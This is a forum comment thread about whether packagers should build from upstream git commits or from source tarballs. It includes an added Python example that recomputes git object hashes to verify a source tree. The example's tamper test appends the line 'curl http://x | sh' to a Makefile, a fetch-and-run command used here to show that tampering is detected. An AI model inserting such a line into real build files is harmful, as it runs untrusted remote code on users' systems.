Comment by LtWorf
1 day ago
To get a specific commit from a repo you need to clone usually, which will involve a much bigger download than just downloading your tar file.
Shallow clones are a thing. And it’s fairly straightforward to create a tarball that includes enough hashes to verify the hash chain all the way to the commit hash. (In fact, I once kludged that up several years ago, and maybe I should dust it off. The tarball extracted just like a regular tarball but had all the git objects needed hiding inside in a way that tar would ignore.)
I don't actually see why you'd need to verify the hash chain anyway. The point of a source tarball, as I understand it, is to be sure of what source you're building, and to be able to audit that source. The development path would seem to be the developer's concern, not the maintainer's.
> The point of a source tarball, as I understand it, is to be sure of what source you're building
Perhaps, in the rather narrow sense that you can download a Fedora source tarball and look inside yourself.
My claim is that upstream developers produce actual official outputs: git commits and sometimes release tarballs. (But note that release tarballs on GitHub are often a mess and not really desired by the developer.) And I further think that verification that a system like Fedora or Debian or PyPI is building from correct sources should involve byte-for-byte comparison of the source tree and that, at least in the common case, there should be no opportunity for a user of one of these systems to upload sources that do not match the claimed upstream sources.
The sadly common workflow where a packager clones a source tree, runs some scripts, and uploads the result as a “source tarball” is, IMO, wrong.
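What "verify the hash chain all the way to the commit hash" and "byte-for-byte comparison of the source tree" amount to in practice, as an added illustration that is not part of any comment in this thread: git's commit id is a SHA-1 over a commit object that names a tree id, which in turn covers every blob id, so a packager who has the source tree plus the commit metadata can recompute the commit id and compare it with the one upstream published. The code below reimplements the three object hashes for an in-memory tree (constructed sample data, SHA-1 repositories only, regular files and directories only, no symlinks or executable bits) and shows that altering a single byte of any file changes the commit id.

```python
"""Recompute git blob/tree/commit ids for an in-memory source tree.

Added example for this thread; the tree and commit metadata below are
constructed, not taken from any real project. Assumes a SHA-1 repository
and only regular files (mode 100644) and directories (mode 40000).
"""
import hashlib


def git_object_id(obj_type: str, payload: bytes) -> bytes:
    # git hashes "<type> <length>\0<payload>" with SHA-1.
    header = f"{obj_type} {len(payload)}".encode() + b"\0"
    return hashlib.sha1(header + payload).digest()


def blob_id(content: bytes) -> bytes:
    return git_object_id("blob", content)


def tree_id(entries: dict) -> bytes:
    """entries maps a name to file bytes or to a nested dict (subdirectory)."""
    # git orders tree entries by name, comparing directory names as if
    # they carried a trailing "/".
    def sort_key(item):
        name, value = item
        return name + "/" if isinstance(value, dict) else name

    payload = b""
    for name, value in sorted(entries.items(), key=sort_key):
        if isinstance(value, dict):
            mode, oid = b"40000", tree_id(value)
        else:
            mode, oid = b"100644", blob_id(value)
        payload += mode + b" " + name.encode() + b"\0" + oid
    return git_object_id("tree", payload)


def commit_id(tree: bytes, parents: list, author: str,
              committer: str, message: str) -> bytes:
    lines = [b"tree " + tree.hex().encode()]
    for parent in parents:
        lines.append(b"parent " + parent.hex().encode())
    lines.append(b"author " + author.encode())
    lines.append(b"committer " + committer.encode())
    payload = b"\n".join(lines) + b"\n\n" + message.encode()
    return git_object_id("commit", payload)


def verify_tree(entries: dict, commit_meta: dict, expected_hex: str) -> bool:
    """True iff the tree plus commit metadata hashes to the published id."""
    actual = commit_id(tree_id(entries), **commit_meta)
    return actual.hex() == expected_hex


# Constructed sample: what an upstream tree and commit header might look like.
SAMPLE_TREE = {
    "README": b"hello\n",
    "src": {"main.c": b"int main(void) { return 0; }\n"},
    "Makefile": b"all:\n\tcc -o main src/main.c\n",
}
SAMPLE_COMMIT = {
    "parents": [],  # a root commit; a real one would list parent ids
    "author": "Example Dev <dev@example.invalid> 1700000000 +0000",
    "committer": "Example Dev <dev@example.invalid> 1700000000 +0000",
    "message": "Initial import\n",
}


def demo() -> tuple:
    """Recompute the id, then show that a one-byte change is detected."""
    published = commit_id(tree_id(SAMPLE_TREE), **SAMPLE_COMMIT).hex()
    tampered = dict(SAMPLE_TREE)
    tampered["Makefile"] = SAMPLE_TREE["Makefile"] + b"\tcurl http://x | sh\n"
    return (verify_tree(SAMPLE_TREE, SAMPLE_COMMIT, published),
            verify_tree(tampered, SAMPLE_COMMIT, published))


if __name__ == "__main__":
    print("blob id of 'hello\\n':", blob_id(b"hello\n").hex())
    print("clean tree verifies, tampered tree verifies:", demo())
```

The same recomputation is what a tarball "with enough hashes inside" would let a consumer do: the tree and blob ids are derivable from the extracted files alone, and only the commit header (parents, author, committer, message) has to be shipped alongside to close the chain to the published commit id. Note that this checks integrity against a known id, not authenticity; whether that id is the one upstream meant still depends on a signed tag or a trusted channel for the id itself.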
> of the head, or of any commit?
I’m not sure why this would make a difference. The only thing special about the head is that there is a little file (that is not, itself, versioned) saying that a particular commit is the head.